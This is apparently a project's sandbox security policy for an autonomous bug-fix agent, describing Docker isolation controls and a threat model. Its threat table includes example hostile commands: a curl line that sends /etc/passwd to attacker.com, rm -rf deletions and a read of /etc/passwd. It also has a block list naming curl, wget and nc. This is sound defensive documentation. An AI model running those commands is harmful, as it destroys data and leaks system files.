Spaces:

SouravNath
/

repomind-api

Running

App Files Files Community

repomind-api / docs /SECURITY_POLICY.md

SouravNath

Initial commit

dc71cad 4 days ago

preview code

raw

history blame contribute delete

3.62 kB

	# Sandbox Security Policy

	## Purpose
	This document describes the security controls applied to the Docker-based code execution
	sandbox used by the Autonomous Code Review & Bug-Fix Agent.

	## Threat Model
	The sandbox runs untrusted LLM-generated code and arbitrary pytest test suites
	from public GitHub repositories. The risk categories are:

	\| Threat \| Example \| Control \|
	\|--------\|---------\|---------\|
	\| Data exfiltration \| `curl https://attacker.com/$(cat /etc/passwd)` \| `--network=none` \|
	\| Resource exhaustion \| Infinite loop / fork bomb \| `--memory=2g`, `--cpus=2.0`, 60s timeout \|
	\| Host filesystem access \| `open('/etc/passwd')` \| `--read-only`, volume-limited \|
	\| Privilege escalation \| `sudo rm -rf /` \| Non-root user (uid=1000) \|
	\| Malicious commands \| `rm -rf /workspace` \| Command whitelist \|
	\| Persistent state \| Writing outside /workspace \| `--read-only` + limited tmpfs \|

	## Security Controls (7 Layers)

	### 1. Network Isolation — `--network=none`
	The container has zero network access. No DNS, no HTTP, no TCP sockets.
	This is the most important control — it prevents data exfiltration and
	supply-chain attacks from untrusted test dependencies.

	### 2. Memory cgroup — `--memory=2g`
	Container is killed by the kernel OOM killer if memory exceeds 2 GB.
	Prevents fork bombs and memory exhaustion from affecting the host.

	### 3. CPU cgroup — `--cpus=2.0`
	Limits container to 2 CPU cores. Prevents CPU saturation that would
	degrade other running containers / the host system.

	### 4. Read-Only Filesystem — `--read-only --tmpfs=/tmp:size=256m`
	The container's filesystem is mounted read-only. Only two writable locations:
	- `/workspace` — the cloned repo (bind-mounted, scoped to this run)
	- `/tmp` — tmpfs, 256 MB, wiped at container exit

	### 5. Command Whitelist — `ALLOWED_COMMANDS`
	Before any command reaches Docker, the executor checks the base command name
	against an allowlist: `{git, pytest, python, python3, pip, pip3, cat, ls, echo,
	find, grep, head, tail, mkdir, cp, mv, touch, chmod}`.

	Commands like `rm`, `curl`, `wget`, `bash`, `sh`, `nc` are blocked at this layer.

	### 6. Non-Root User — `uid=1000`
	All processes run as `agent:agent (1000:1000)`. If an exploit escapes the
	command whitelist, it cannot modify system files or escalate privileges.

	### 7. Timeout — 60 seconds SIGKILL
	The executor sets a 60-second hard timeout. The container is killed via
	`docker stop --time=0` (SIGKILL) to prevent hung processes from consuming
	resources indefinitely.

	## Isolation Per Run
	Each SWE-bench instance gets a fresh temporary directory as its workspace.
	The container is created with `--rm` so it is automatically deleted after each run.
	No state persists between runs.

	## Audit Log
	Every command executed in the sandbox is logged with:
	- instance_id
	- command (truncated to first 3 tokens for brevity)
	- returncode
	- elapsed_seconds
	- timed_out flag

	Logs are written to `structlog` (JSON format in production) and ingested by
	the Prometheus/Grafana observability stack in Phase 8.

	## Known Limitations
	- Conda environments: Some SWE-bench repos require specific conda environments
	with C extensions. The current sandbox uses pip-only install. This may cause
	test failures for repos with complex native dependencies.
	- Docker-in-Docker: The sandbox does not support running Docker inside Docker.
	Repos that spawn subprocesses to call Docker will fail at the network level.
	- Flaky tests: ~8% of SWE-bench issues have non-deterministic tests. These may
	burn retries even when the patch is correct. Flagged as `flaky_test` category.